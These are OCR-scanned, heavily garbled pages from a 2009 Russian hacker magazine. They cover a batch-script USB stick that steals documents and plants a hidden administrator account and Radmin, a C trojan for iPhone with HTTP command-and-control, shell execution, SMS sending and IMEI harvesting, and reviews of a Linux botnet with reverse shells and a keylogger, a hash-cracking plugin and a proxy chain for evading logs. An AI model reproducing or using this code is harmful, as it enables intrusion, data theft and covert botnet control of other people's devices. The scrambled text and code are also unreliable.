Uз:'ШНОЕ МЕНЮ МОЕГОДЕВАЙСД

set nO_\.1.se_LanМod_for_Rad1nin=O- мне не ПЫ'И1ТЬСЯ уста··

наВJIИВа.ть радмин по сети на соседние машин.ы?

set use_only_rad1nin=O - вся а.така должна сосгонть ТОПЬ­

КО иЗ установки радмина ?

set no_create_message=O - в процесс е рабо'Т·ы не исполь­

зовать место на диске дпя создания сообщений

set no_display_message=o - про попьзова'Т·епя совсем за­

будем? Ну и правильно - ему нечего знать не надо

Отдельно хотелось бы рассказать об атаке на гостя, которая является

гвоздем нашей про граммы:

создд..ЕМ ГЛОБАЛЬНЫЕ ПЕРЕМЕННЫЕДЛЯ РАБОТЫ if %attack_for_9uest%==O goto тЗ - искпючающее ИЛИ

НАШЕИ ФЛЕШКИ chcp 1251 - подключим кодировку для кириллицы

пеt uSer гость / act ive :уеэ - активируем учетную запись

Cookies cookies .jpeg .jpg .Ьmр .gif .pic .pict .ico гас'Т'Я

фильтры! ч:тобы не перегрузи'Тъ флешку ВСЯКИМ хламом

rem #.jpeg .jpg .Ьmр .gif .pic .pict . ico .gif .html пеt. localgroup аДViинистраторы гость /адб - сделаем гос­

.htm - другой набор фильтров под другие задачи тн равным администратору по правам

set find_evristic_analyze_in_file_types:l - включить

ли искусственный интеллект для типов фаилов ? (О \ 1) @reg add «ИКЕУ_LОСАL_МАСНINЕ\SОFТWАRЕ\МiсгоsоЕt\

set find_evristic_analyze~in_file_folders=l
- дать ли Wiпdо,,,s NT\CllrrentVers iоп\Wiпlоgоп\SресiаlАССОllлts\
искусственном.}' интелпе.к'I'У доступ к структуре ПdПОК? UserList» /v гость /t reg_dword /д О /Е - скроем появив­

(0\1 )
шуюся учетку с ГЛdЗ долой от юзера

set recent_folder_for_analyze=%homedrive%%homepath%\

Recent\
net user гость 1234 - приправим паролем ло вкусу

set no_find_documents=O - мне не искать текстовые доку­

менты вообще?
ОБ УДОБСТВАХ НЕ ЗАБЫВАЕМ
set no_copy_all_documents=O - вообще rтpопускаТh копи­
Ну, хорошо, МЫ в какой-то степени удовлетворили наши заllрОСЫ по
рование каких-либо документов?
взлому, НО помимо всего прочего, моя система обладает массой прият­
set not_attacking=O - не а'rаКОБат,,?
ных феliечек и фишек, таких, как автоматизированный вход в аську. На
set no_use_radmin=O - мне нельзя устанавливать раД~fИ1-f
диске ты слегкостью должен найти файл «pqp bat".
тронна в целевую систему?
Именно он управл~етвводом пароля ЭтотскриП1" 11росматриваетсвое

~ 062 ХДКЕ Р 06 /126/ 09

rli8lll

~ » Е:3ЛОМ

, Стэндзрт uз
• 90ttтаНО&Л8ние даННI
fp}ll1n't ~USВ Flasl1 DfNe Кlщ,tstоn»)
неисправ:ных носитеП81
8: поаЙС-l1ис:те
в' кэтэпоге · В ОГ\\1с8нYl" не УlI:аэзн~,
r.педуlOШИЙ тоеар скорость рвоoтыlБвB F'
прe..qъщущиЙ ТОtlзр Drlve, на какой скорос-п
работает?

• Как "делать USB Flas!

ДОUOlВШь. В cp'tBWeHIlt:; О I СП'1:.~~_[~~~Р~I) ! эзrруэочны
M

• ФrI'JWХВ ДOI"DКHa ЖНТЬ ';

ораtМИТIo , Мn" ~oo. AfI~ О'ТlAtи ... Cp ... MIНltA

версll.Я для пе:Ч3JJ1

'­
АРJIIКУЛ: ?t-l450-1 НllПllЧllе H.J. скn.ще: В Д(1ННЫЙ 1,IOI,teHT Q1cyrCIByer. ПосrynлеНllЯ в ЛI'ОДt)ЖУ H~ t)".t!11Д.)~I~~R.

1i ООСI.IО1ЕННЬ пос:педнюю цеку

r::--------------------~---·--------I
~~~ыe_. ..1.

Проиээодитеnь Кiпgs!oп

Модель DataTraveler .Ч~ ~~.~.~.~:~ 1Gb

US8 брелок с по.дцеРЖIОЙ технологии U3 (You free) ПОЭ90ПЯiOЩИИ эапускаtъ с Yt1PОКС1ВЗ проrрэммы Форм..-ra uз

Опнсанне
х'р.'ЗН:=t~е 91;8 денные H2Il1ash приводе и свободно переНQСИJ.ilые с однот ПКна дРуrоЙ. ...

ТИп харты ПВМАЩ

у'З.8 Flosh Or1re.

Обьем Flаsh-нsкопнтanя
1ГО

цсета иепoJlьэовэнныe в

Серебрнсты~.черный
оформлении

Сро!( rарэнтнрозэнного )фанени~

До 10 пет
данных

МЭkсимanьные _пе..;р_е..;.'Р.;.У3_·к_" 1_00_0_G_П Р_".;.р_.о_о_re .. _

lb.~IJ.-I!IIе~~~'lЬНОС111

ФЛЕШКА В МАГАЗИНЕ С НЕТЕРПЕНИЕМ ЖДЕТ СВОЕГО ПОКУПАТЕЛЯ

тело и последовательно осуществляет клавиатурный ввод односимволь­ п ропи сать та м нужн ые идентифи каторы. 80Т список уже поддержи­
ных комментариев в тексте про граммы. Если раскидать по этому файлу ваем ых:

комментарии таким образом.

БАSЕ

rem '! DRVG

rem 1
GUARD
:r:el11 3
spy
rern 3

тет k По сути, это rл05зльные nepeMeHHble твоей операционной системы,

rem g которые восстанавливаются при каждом входе в нее Пользуйся на

rеПl r здоровье,

тещ s
ОБСУДИМ ИТОГИ
- то на выходе мы получим пароль "V13Зkgгs». В итоге, пасс хранится МЫ получили, своего рода платформу, которая будет отлично работать

в нестанда ртном виде и нетребует при вводе нашего участия. не только на Т80ей машине, но и где-тотам, в чужой квартире, похищая

Следующая приятная фишка. если на флешке окажется места нужные тебе данные, И неважно, кто ты, мой читатель,утебя всегда
мен ьше эаранее оп ределенного объема. то автоматически от­ найдyrся вопросы и задачи, с которыми могла бы справитьсямоя система.

кроется утилита для удобного рассмотрения содержимого диска Допустим,ты студент-раздолбай,тогда флешка поможеттебе достать не
«sсаппег ехе», Ты меломан, как и я?Тогда тебя порадует встроенная только курсовые yTBoero препода. но и чертежи и прочую хрень, которая

поддержка плейлистов от Windows Med'la Player и воэможностьих поставляется в комплекте с курсачом, Если ты уже поимел всю сеть вуза
пересоэдания специальнымскрнптом или вовсе автоматически.Вся и помогаешь COTPYAHI~KaM через RаdmlП раскладывать пасьянс, то
музыка для этого заботливоукладывается в папочку MUZON Если у можешь пойти прогуляться до ближайшего салона сотовой связи. Есть
тебя 8ключен идентификатор типа «% BASE"/o~=8ASE", то система шанс заполучить в свои мохнатые руки их платежных клиентов - 8Ы­

автоматически скопируеттебе на рабочий стол в отдельную папочку году оценивай сам, Если тебе и этого мало, то хочу отметить целый ряд
все награбленное добро с флешки 51 в свое время успешно ее ис­ ситуаций, когда. не дай Бог, сотрудник Сбербанка согласится принять
пользовал для решения повседневных задач системного админист­ с твоей флешки отсканированный тобой чек.

ратора, вроде полностью автоматизированной установки и настойки,
например. антивирусов на компьютерах
Чуть не забыл I Чтобы собственная флешка не ополчилась на тебя,
неоБХОДИI~О залезть по адресу «Пуск ~ Настройка ~ Панель
управления ~ Система ~ Допоnнительно ~ Переменные среды» и
Более того, сейчас все на каждом углу в ужасе кричат от эпидемии вируса
юзе ров Сопfiсkег, а чем ты хуже? Неужели, имея в своем распоряжении такой мощ­
ный инструмент, ты не 8 состоянии нап исать свой тренировочный ботнет?
Одним словом - срочно беги искать флеш-диск U3шного типа. Впрочем,
если немного позаниматься мазохизмом, сойдет любая флешка.::Х::

Х.АКЕР 06 112М О?
~ 06з
 >> В;;:ЛОIY1

~////л
Х DOZNP
/ HTTP,1I0XOD.RU I

каНЬВЯБлаКАХ
П!И1ШЕМ ТРОЯН длЯ' APPLE IPHONE

в прошлых статьях я описал основные уязвимости App:le iPhone,

дал инструкции по созданию автоматическогосканера безопас­
ности на базеточки доступа и рассказал о концепции ботнета
для телефонов. Сегодня я подробно опишу создание трояна для
Apple iPhone .

• ФОРМАТ _ 5. Пятая и шестая части - apryMeHTbI Первые три параметра - управляющая часть,
УПРАВЛЯЮЩЕИ КОМАНДЫ для отправки конанды , например: инструкция типа «что сдепать». Вторые три
Первое, с чего надо начать написаниетрояна­ • %791.02020202% нонер телефона в неж­ параметра - OTBeTHa~ часть, инструкция типа

разработка формата команды. которую сервер дунарсдном формате «куда скинуть результат выполнения». Если
будет передавать клиентам [заражен ны м тел ефо­ • %192.168.1.1 OO%/master-server /res. с этим все понятно, то нечего тянуть резину,

нам). я предлагаю вотта:<ой вид php?res=% переходим к кодингу.

ПримерЬ! команд:

1~ Команда состоит из шести частей I • sm%79101010101%test is ОК%О%О%О% ­ АРХИТЕКТУРА ПРОГРАММЫ

раsдепе!-t-НЫХ С:V&IВОЛОМ "%" отправить емс стекстон; "test is ОК" Все функции Я разнес по отдельным файлам в
2. перsая час'I'Ь: на номер +79101010101 зависимости отсмысловой нагрузки. Основной
• at% ДТ-команда. для модема • sh%ping -с10 '"lWW. ru%0%ws%192. файл trojan.c максимально облегчен от ненужно­
• sm% команда отправки еме 168.1.100%/master-server/res. го кода. Вот список файлов и их назначений

• sh% конанда тепла (например, 15. Р~lр?гез=% - 8Ь!ПОrrnить комаыду шелла

whoarni. ping 'NW''''.ru) «ping www.ru» и выслать результат вы­ trojan. с' Основной файл с main () функ­

.. \:g% команда аастройки работы самого полнения на 192.168.1.100 цией программы

трояна • tg%3600%0%0%O%O% - установить ин­ Makef:ile ИНСТРУКЦИИутилите make для

з. третьи 'и вторг.я части - артуме:rrы тервал полуqения конанды с сервера сборки трояна

команды ИЗ первой части. На.прИМЕ:р: равным 3БОО секунд

• sm%79101010101%TEST is ок%<хвост . /cmd: Разбор С'lраки с командой и эа­

команды> Пару слов О разделителе. я максимально хотел i!олнею-rе структуры

4. LfетвеРТБЯ час'1'Ь - ТИП отправки использовать команды шелла. поэтому оставил cmd-parser.c

результата КОМОЕДЫ, нонет ПРЮiИ1'1ать все спецсимволы на ИСГiользование в скриптах crnd-parser.h

знаqения: (чтобы можно было выполнять разные там catl

.. %~7S% отправка ht.t.р-эап:росом пара­ devJrandom > Itmр/fuсk-mеmоrу-есопоmу или . /!.1L tp: HT'l'P·-клиент. Отправка эапро­

метра GET l51 I grep (х! и np.l. Таким обраэом, разделите­ СОВ, ВОЗ.8ращениерезультата

• %sm% отправка «ВНУТРИ» SМS-сосбще­ лем стал про цент - %. Что касается общей кон­ ht.tp-c1ient. с

ния цепции команды. то здесь все тоже очевидно Ilt t.p-cl j.Gпt.. h

~ 064 ХАКЕР 06 /1261 09

 11

ПРОСМОТР ВСЕХ ЗАРАЖЕННЫХ ТЕЛЕФОНОВ БРОДКАСТКОМАНДА.ЕЕВЫПОЛНЯТВСЕУ(~

ВАДМИНКЕНАСЕРВЕРЕ РОЙСТВА

· / sms: Работа с АТ-коиандаии. OTlГpaB­ *( (struct in_addr *)he->h_addr); дошли. Как говорится, сначала напиши, потом

ка сие, получение IИЕI и CeID mеmsеt(&(thеiг_аddг.siп_zеrо)

, оптимизируй. Так что, это оставим надомашнее

SH1s-fuпсs.с '\0' , 8); задание, Теперь сам парсинг. Он основывается

SПls-fUnСS.h iE(conneet(soekEd, на базовой функции strlok. которая выполняетза

(strllct soekaddr *) &their_addr, нас разБиениестроки натокены по спецсимволу

· / s t ruc t s: Описание СТРУКТУРЫ команды sizeof (SПllсt sockaddr)) == -1) %. Вотисходник:

eO!"INAND eXlc(l) ;
eommand.e stЛlеt COММA.ND parseCmd(char *resp) (
Н( (nnrnbytes = send(sockfd, msg,
ehar **parsed = (ehar *)
· /utils: Утилихы. CO~"1cat ДЛЯ KoppeKT~ str1еп(msg), О)) == -11
шаllое (SIZE) ;
ного СЛИЯНИЯ ДВУХ строк в одну l.ПL: i=O;
uti1s-concat.c
exit (1) ; for(i=O; i<SIZE; i++1
uti1s-concat .:"1

parsed[ij = (Char*)

ПИШЕМ ПРОСТЕНЬКИЙ iпt bytes = О;

ma11oe(t1AX_SIZE);

HTTPCLIENT bytes = (recv(soekEd, buf,

ЗаБирать команды с сервера наш троян будет МAXDATASIZE-1, О)); (strstx-(resp, "emd: ") 1=NULL)
по НТТР. Поэтому надо написаТь простенький if (bytes < 1) UCНAR eJl1d[1024];
клиенТНа сокетах. Готовые вещи в нашем случае strnepy(emd,&resp[172] ,
бестолковы, а форматhttр-запроса, думаю, ты ехН(l); (str1en(resp)-170) );
помнишь наизусть. Если не помнишь - ничего char * реЬ = strtok(cmd., "%");
страшного, напомню. Использовать ~Ш будем else i f (bytes<I',AXDATASIZE) i = О;

только стандартные библиотеки: netdb h. sys/ while (pch!=NULL)

types,h, r.etlnet/ln.h, sys/socket.h. Вобщем, полу­ [
чится при мерно та к: eJse
parsed[iJ=pch;
exit(l);
рсЬ= strtok (NULL, "%");
сЬас* sепdНt tpRequest (char *host, e10se (sockfd) ;
i++;
char *ur1)
return bllf; strnepy(CO!~~D.ct, parsed[OJ,

inl~ sockfd, пUП1Ьуtеs; sizeof(COММAND.et» ;

char buf [ИАХDАТАSIZЕ] ; strncpy(COММAND.p1, parsed[l),
struct hоstепt *Ье; Тут накладываютсяограниченияв 2 КБ на строку sizeoE(CO~~.ND.p1}};

st;ruct sockaddr_J.n thei:c_add:c;

URL и ответ сервера. Если их будет малодля strперу(СОММAND,р2, parsed[2J,

ehar* msg[2048J;
твоих целей -увеличишьбез проблем Только не sizeoL{COММAND.p2));

sprintf (шsg, "GE'!' %s HT'IPI1.1 \r\n" ,

забудьочищатьnepeMeHHbIe, все-таки чистый С, strпсру(СОММ1L~D.гt, раrsеd[З] ,
l.Jrl) ;
никаких тебе сборщи ков мусора .1. sizeof (COММANO. rt) );
if (str1еп(hоst) 1=0)
strnepy (COММANlJ. rJ., parsed [4] ,
ПАРСИМ КОМАНДУСЕРВЕРА sizeol(COММAND.r1)) ;
spr"intE (rпSQ, "%sHost: %s\r\n ll
, Послетого, :,ак мы получили строку с командой. strпсру(СОНI1AND.r2, parsed[5J,
msg, host); ее надо разобрать и заполнv,ть соответствующую sizeof(CO~U\ND.r2));

структуру. Сама структура выглядиттак: Eor (i=Oi i<SIZEi i+-i-)

sprintf (msg, "%s Сасhе-Сопtrо1: по­ parsed[~] = NU:L:L;
сасhе\r\пUsеr-Аgепt: bad-trоJап\r\п\ struet COMMAND{

r\n" , msg) ; ehar ct [3J;

ret1.lrn COММANO;

i lt received~O; ehar р1 [257] ;

Н{ (he~gethostbyname{host»)~~ NlJТ~L) char р2 [257 J ;

return COHMAND;
exit(l); elblr rt [3];

if ( (sockfd = soeket (АР_INET ,

char rl[257];

SOCK_STREAМ, О)) =~ -1)

char у2 [257];
8роце все понятно? Никаких особых приемов
exit (1) ;
}; здесь не использовано Только прошу быть
their_addr.sin_fami1y = AF_INEТ; аккуратнее с переполнениями Буфера. Код
their_addr.9in-po~t = htons(PORT); По-хорошему.тип команды и тип ответа надо трояна по этой части еще придется хорошенько

their_addr.sin_addr = было выставитьв iпt, но до этого РУКИ У меня не допилить,

ХАКЕР 06 /126/ 09 ~ 065

СПЕЦИАЛЬНАЯ КОМАНДА. УНИ­
КАЛЬНАДЛЯ КАЖДОГО ТЕЛЕФО­
НА. МОЖЕТ ЗАСТАВИТЬ ПЕРЕДАТЬ
ЛИЧНЫЕ ДАННЫЕ

ПОСЫЛАЕМ АТ-КОМАНДЫ я очищаю очередьсообщенI'1Й.чтобы не заморачиватьсяи не разбирать

МОДЕМУТЕЛЕФОНА строкуответа модема на командуАТ+CMGW. По правильному. она возвра­

в ~,apTOBCKOM номере Я уже приводил исходник программы для отправки щает номеРТ80его набранного емс, далее его и надо использовать для

еме На всякий случа Й. повторю основные моменты, М ы используем аргумента АТ +CMSS. Утакого подхода есть небольшой нюанс - троян пре­
резервное системноеустроЙство/dеv/ttу,dеЬug. через которое посыла­ красно работает, но сам телефон еме отправить после такого уже не может,

ются АТ-команды Основное устройство /dev/tty заблокирова но родным и Приходиться переэагружаться, В общем, этотбагя оставил специально.

демона м и телефона и использовать его не получится, М ы инициализируем чтобы тебе тоже было чем заняться J
соединение на скорости 115200 бод вот так' Помимо отправки СМС, допишем еще две функции, чтобы получать IMEI
телефона и ссю Это уникальные номера, их можно использоватьдля

iJ1C InitConn (iпt speed) идентификации каждого за раженного образца:

int Ед = open("/dev/cty,debug", O_RD\\'R I O_NOCTTY); c:har" getCCID ( ) {

if [fd == -1) { int Ed;
fprincf(stderr, "%i (%s) \п", errno, strеrrог(ег,по)); fd = IпitСОrJл(115200);

exit(l); AT(fd) ;

SendCГI1d(fd, "AT+CCID\r" ,9);

ioccl(fd, TIOCEXCL);
char* res = ReadResp (fd)

fC!ltl(fd, F_SETFL, О);

C1oseConn (fd) ;

tcgecattr(ld, &terrn);

gOriginal TTYAttrs = terrn;

cfrnakeraw(&term) ;
char* getIMEI{) (

c[setspeed(&term, speed);
inc: fd;

term. с_сПаg = С58 I CLOCAL I CREAD;

fd = IпitСоnг,(1l5200);

term.c_iflag = О;
AT(fd) ;

tеrm.с_оПа.g = О; SепdСшд ( fd, "AT+CGSN\ r" , 9) ;

term.c_1flag = О; ch<:>r* res = ReadPesp (f:d)

term.c_cc[\IМIN] = О; Сl0sеСопп(fd) ;

t егт. с_сс [VТlМE] = О; return res;

tcsetattr(fd, TC5ANO"I, &tепп);

rеtЦПl Ео;

Ну вот, закончили cAT-командами.Теперь можнообъеди,нитьвсе 8месте в

mаlnфУНКЦИИ,
После этого МОжнО писать вустройство:
РЕГИСТРАЦИЯТЕЛЕФОНА
void SепdСmд(iпt [д, voicl *ЬцЕ, size_t size) В БОТНЕТЕИПОЛУЧЕНИЕКОМАНДЫ
Чтобы хозяин знал, что в его коллекции появилсяеще один зверек, зара­

i.i ('Nrite(ld, :')uf, size) == -1} жен ному надо зарегистрироваться,С точки зрения трояна - это просто
еще один http-заГ1РОс. В качестве пара метра передает IMEI телефона и
fprinl:.f (stderr, "SendCmd error. %Б\П", trerror !err!lo) ) ; проверочный код, Код - это специальная функция. вычисленная от IMEI, В
exit(l); прошлой статье я приводил ее исходник на РНР на стороне сервера, А вот
} реализация на С:

) )
int getVKey (char* iшеi)

Для отправки СМС используется такая последовательность команд: if (strlen(imei) !=15) return -1;

int 'fkey = О;

A'r+CMGD=l !! удаляем "се СМС из о'{ереди. "1Тобы наше сообще­ int i = Oj

ние стало первым int с = О;

AT+CMGF= 1 / / переводим иодеи в текс:т()вPtЙ режим

;'пt. 1 = О;

AT+CMGW=79000000000 1/ номер П"ЛУЧС1теля

iпtш=О;

1./ Набираем сано соо6шение

char *1< = (char ") malloc (1) ;

AT+C!-1SS=l 11 отправляеи наше сообщение

for (i=O; i<5; i++) (

~ 066 XAIKEP 06 /Н6/ 09

 РЕЗУЛЬТАТ ВЫПОЛНЕНИЯ НАЗАРАЖЕННОМ ТЕЛЕ­
ФоНЕ еКРИПТА #DATE; UNAME-A

s\..-itch (i) {
else j f (strstr (СОЮ~D. rt, "И5")! =NULl,)
саве О: 1 = 3; т = 101; break;
if (5t.rJ.еn(СОИМАND.гl»N!,LLи,

с ве 1: 1. = 7; m = 107; bJ.:eak;
str1en(CO~дND.r2»O) (
са:;," 2: 1. " 8; т = 3; break;
С]1ат *LlrJ.J:es[1024J;
cas," 3; 1 = 11; гt1 = 9; break;
sprintf(ur1res, "%В%5", СОЮ~D.г2,rеs);
саве 4; 1 = 13; lil = 71; break;
sendHt.tpReql,est (СОММ)ШD. [-1, urlres) ; ~ dvd
fr-ee(urlres) ; • Рабочую версию ис­
тетеру (k, &imei [1], 1);
XOAHvi1(OB ты ~а~lДешь

с = atoi (k) ;
на диске.

v'keY+=C*ffii
• Новую версию

else if (st.rst.г·(СОММАND_СL, "sh") !=NULLI ( сервера для ботнета

i f (strJ.еп(СОЮ~D.р1»0)( тоже ищи на диске

intl'egzombie(char-* imej) (
system(COt~~O.p1) ;
char-* regur-1.[1024];

sprintf(regur1,"/master-server/reg.

php?imei=%s&vkey=%d" ,imei, getVKey(imei)); eJ.se i f (strstr (COММANO.се , "tg") !=-NПЫ.. ) (

send}ittpRequest (" 192.168.10.1" ,regU!:1) ; if (str1en{СОЮ1AND_рJ.)>0) (

r-еtJrп О; timeout=atoi (СОЮ1АND.рJ.) i

return О;

MAIN() - ВСЕМУ ГОЛОВА

Осталось самая малость - написать главную функцию. Здесь ~ links
м ы будем в цикле принимать и обрабатывать при шедшие int mаiп(iпt argc, сЬа!" **argv)
bJ..tJ2:Uохоd.гu - мой
команды от сервера и, в зависимости от команд, выполнять те regzombie(getIMEI{)};
блог. Пишупо мере
или и н ые действия. Мен ьше слов, больше кода: иhilе (1.) (
желания. Жду ком­
sleep(timeout) i
ментариеВ,отвечу

i n t доСmд ( s с. ruct СОИИAND COММAND) { COММANO = takeCmd ( Т ) ;

на 80ПрОСЫ_

iE (strstr (СОИИАND. ct, "!От")! =NULL) доСmд (COММANO) ;

if (stгlел(СОММAND.р11 > О) { СОЮ!AND = takeCmd(O);

if (strst[·(СОММJl,ND.р2, "getIHEI") !=NULL) doCmd ( СОЮ1АND) ;

sепdSМS(СО~ЛD.р1,gеtIМЕI())
;
}

}
}

е1.ве if (str1en (СОММAJ'Ш.р1)==1)

.1.1 !'IOMep по УМОl1чг.:Н-iИJC J использовался П1.JИ Ну что, все оченьпросто и открыто. Самый главный хаквзтомтро­
/I записи видео-ролика дr1Я Х яне - написанная правильными ребятами утилита ldid. Она поз­
sendSMS (" 89100000000" ,COMHA..1I1D.p2) ; 80ляетподписать скомпилен I~ЫЙ бинарник, чтобы он запускался
} нателефоне Процецура эта уникальна для каждого аппарата. Тут ~ warni'ng
eise ( возникает необходимость копироватьэ1)'УТИЛИ1)' на зараженный 8НИ'1ание! Инфор­
sendSMS(CO~\NO p1,co~ft~D.p2); телефон, если она не была установлена самим владельцем вмес­ мация представлена

} те с каким-нибудь па кетом. Ноэто уже дело техники внедрения. исключительно

) Можетбыть, я еще напишуобэтом в следующей статье. с целью ознакомле­

} / НИRI Ниавтор,

eJse .~f (strstr(СОМИАND,сt, "at") !=NULL)

ЗАКЛЮЧЕНИЕ ни редакция за твои

i f (stг1.еп(СОЮ1AND.р1.) > О)
Все когда-то кончается. Вкусное пиво иссякает, интересные деЙСТВИR ответствен­
сЬат *тев[1024];
идеи безнадежно устаревают, мечты материализуЮТСR или ности не Hecyтl

sprintf (res, "%в" ,gеtСАLL{СШ1МAND.р1));

уходят сами собой, а про деньги Rдаже не говорю. 80Т и подо­
i f (stгsU-{СОМИANО.гt, "зm") !=NUl,TJ)
шел к концу цикл статей по Арр[е iPhone. Где-то было скучно,
i f (stгlеп(СО~ЫD.rl»О)
где-то непонятно, ЧТО-ТО я упустил, что-то недосмотрел - без

sendSMS (СОММАND.г1,тев) ;
этого никуда. Надеюсь, тебе была полезна эта и прошлыеста­
}
тьи цикла Как всегда, на все Bonpocbl отеечаю в блоге - b.ШdL
}
охоd.ГU Х

ХАКЕР 06 1126/ 09
1I1 I
ПРОГ АММЫ для ХАКЕР._О_В_ _

- ­.... ПРQГРАММА:ХВАRV. 11.2.0 файл со списком доменов После получения

IШI*NIХ/'w'IN результатов можно отпарсить список доменов

M#Ji!J:lV01 D поданным РR/ТИЦ.

Теперь рассмотримфункцию поиска МD5­
IIP IНost !PR !ТVЦ I
хэшей. С ней можно отправлять хэши на
9:2HPSl4Z­ "-'':Df'U ~ 170)) WW'N.mll'.'-'ОГП1.СОПlи 'Nwv<.hаshсгасkiпg.iпfо,
~
~ причем, количествохэшейне ограничено.
~ ...
~
АI1ГОРИТМ твоих действий прост:

ЧУДО-ПЛАГИНДЛЯ FF 1. В разделе аппий плагина I li:a LINUХ-БОТНЕТ

вкладке «General" сними rалку с ПУН­

Ij~~~~~~ Не знаю, какой из браузеровты юзаешь, но я в кта «Disable - Search frorn file» ботнет . Кхм, О чем это я 7 Какты догадался, под

повседнев,IOЙработе привык доверять Flrefox. 2. Зайди на WvM .hashcracking, info и эагадоч'lЫМ определением «система удаленного

Одна иэ причин - огромное количество раз- прими сертификат безопаснос'!'и администрирования» скрывается масса полез­

It~§';mШI нообразных пЛагинов на все случаи жизни.l. 3. Еыбери файлик с хэшаМТ-1 И ЖМИ 6а"Го.н ных софтин, помогающихуправлять множеством

Именно поэтому хочу представить тебе незаме­
нимый плагинХЬаГV.1.2 О oTV01 d'a, созданный
для поиска МD5-хэшей, определения РR(ТИЦ
сайтов и обладающий функцией ReverselP.
Для начала инсталлируем дополнение к Firefox:
4. Опени результат Е окне бра-узера своих [и не совсем своих, а порой и совсем не
своих! компов. Сейчас я хочу представить именно
Пора подводитьитоги функциональности. такую тулзу - «НуЬпd Remote Ad mlПlstratюп
Плагин позволяет· System» OTCSrSS. СофтпреД'lазначенисключи­
тельно для использования на Llпuх-платформеи

• Получать РR/ТИЦ ресурса включает в себя:

1. Сдиваем пла.ГИН с нашего DVD • Работать СО списком ДО1-1енов ИЗ

I 2. Запускаем Fir'efox файла

1. Бот - Perl
1-'---'-'- З. ОТКрЫЕаем файл плагина (F i 1 е - > • СОРТИРОЕать список саЙТОЕ Е соо'г­ 2. Клиентская консоль - Perl: : Gtk2
ореп File -> xBar,xpiJ веТСТЕИИ с результатами по РR/ТИЦ З. НТ1'Р-админка на базе админ-панели

4. Ждем завершения устаНОЕКИ ПРОИЗDОДИТЬ ReverseIP от BlackEnergy (PHP/MySQL)

5. Ре бутим браузер Отправлять МDS-хэш иа анализ прямо

из браузера Бот обладает неплохим функционалом.

Теперь при каждом запуске брауэера в правом • Отправлять на анализ сразу не­

нижнем углу будет дополнительная менюшка, сколько ИD5-хзшей из файла (очень • Connect Back shell (not епсrурtеd)

состоящая из двух пунктов' удобно) - коннектбэк-шелл. Шифрование со­

• Парсить МD5-хэши при загрузке из единения отсутствует

1. SEO файла • Bind shell, port: бббб (not

2, rШ5 .. Искать МD5-хэm.и одновременно по encrypted) - бинд-шелл, Реализоnан

двум ресурсам - ',;vгw. шiJ.wОrrn. сот и в виде отдельной утилы, упраЕляе­

1 - ­ Начнем ПО порядку, Кликаем по батону "SEO" w.vw.hashcracking.info ной ботом; шифРОЕание соединения

и снимаем галочку с опции "Hide» - появится отсутствует

--_._-­ попедля ввода названиядомена,по которо­ Короче говоря, в срочном порядке ставим пла­ • Connect Back Encrypted keylogger
мумы получим РR/ТИЦ, а также ReverselP r'lH и дружно благодаримV01 d'a за очередной - кеЙлоггер. Записывает нажатие

Вбиваем домен и жме~~ "Enter». Через пару релиз l клавиш, кодирует их алгоритмами

секунд перед нами - подробный отчет со всеми rot4 7&RC4 и в режиме реального вре­

необходи м,ыми да н н ым и. При допол н ительном por~~t'1t1~;HYBRID REMOTE }1ени отсылает на удаленную машину .
клике'н-а';начке «+» рядом С IР-адресом серве­ ADMINISTRATION SYSTEM Обработка логов кейлоггера происхо­

ра активируется функция ReverselP. Она позво­ _LINUX дит при ПОМОЩИ клиентской КОНСОЛИ

ляет просмотреть список сайтов, хостящихся на M3i!JlcSRSS • Encrypted Rernote Terminal Еп'.Ulаtоr

~~~~l сервере. Но это еще не все, ибо есть возмож­ В прошлых выпускахХ-Тулз Я неоднократно вы­ (Е. R. Т, Е) - аналог SSH, при помощи

ность получить данные сразу по нескольким кладывал различные системы удаленного адми­ которого бот устанавливает соедине­

I!:'~~~~§ доменам. Для этого заходим в раздел опций нистрирования под Винду, В этот раз я порадую ние с удаленной l:-fашиноЙ. Все данные

плагина, на вкладке «General" снимаем галку С тебя продуктом под совершенно другую платфор­ КОДИРУI:JТСЯ (rot47&RC4), использует­

пункта <cDisable - Search [гот file" и выбираем му - Линух, Да-да, и на Liп ux' е можно поднять ся клиентская консоль.

~ 068 ХА'КЕР 06/116/09

 » в::лоМ

''''---.--t------------------.----

Приступим к конфигурированию системы управ­ exit i

ления Начнем. как водится, с бота. Открываем

сорец бота и редактируем следующие строки: ?>

n1у
$homeserver = ''http://localhost/ и попробуем построитьцепочкупроксиков:
public/getcmd,php"; # ПОЛУ'~ение
ботО!~ команд 1. Заливаен рруоху ,php на два раз­

ту $defaulLSleepTime = 10; ных удаленных сервера. например:

СОБСТВЕННЫЙ ПРОКСИК
# та'Ймаут, "Е спучае отсутствия НОВЫХ http://site1.com/proxY/pproxY.php и

команд http://site2.com/proxy/pproxy.php
все СЛОЖf1ее. Порой прокси может понадобить­ 2. Запyrскаем покальный скрипт со

в сорце консоли бота вносим изменения в ея в самый неподходящиймомент... так какже следующииипараметраии:

параметры: быть? Выход один - иметь под рукой собствен­ per1 ploca1.pl -рх http://sitel.com/
ный проксик. готовый В любую минУ1У обслужить proxy/pproxy,php реу1 pJ.ocal.pl -рх

ту $.server_host = "127. О, 0,1" ; тебя J Причем, проще всего будет поднять не http://site2.com/proxy/pproxy.php
гс хост. на котором находится 601' (не­ Воuпсегили 3ргоху, а Рргоху, о котором я тебе -срх http://localhost: 8008 -Ьр 8009
QбходИМО ДЛЯ Е. R. Т. Е) сейчас расскажу. Тулза представляетеобой РН Р­ З. Пускаем браузер аа порт 8009
ту $pa.ss = "1"; # RC4 пасс (неооходи­ проксик, СОСТОАЩИЙ из двух частей -удаленноЙ 4, Схема цепочки такова: localhost
ио дЛЯ E.R,T.E & Keylogger) Iрргоху php! и локальной (plocal.plJ. На локалхос· -> site1.com -> site2.com -> target
ту $MAXLEN = 1024; те заnускаеТСА перловаА часть, прослушиваю­

ту $LISTEN_PORT = 66б; щая порт, на который liатравл и ваетея браузер.

Аналогичны м образом можно составлятьи более

# порт, на который бот шлет данные а с<:м РНР-прокси заливаеТСА на какой-нибудь

длинные цепочки. Однако не забывай про логи
ШУ $SEND_PORT = 555; # порт. ;;0'1'0- сервер.
web-сервера.В них можно будеттебя отыскать.
рый БQТ будет ПРQСЛУШИВдТЬ Использовать Рргоху довольно просто:

ПРО[Е' t'1ty 1A; FORIJt'1 DETECTOR

Модифицируемhttр-админкунабазеадминкиот 1. СrrачаJ1а запиваем PP~'OKY . php на rmI·*NIX7..;JiN
BlackEnergy' удалеnный сервер. например. tlt tp: / / r;oШI!Ji.DХ
site.com/proxy/pproxy.php
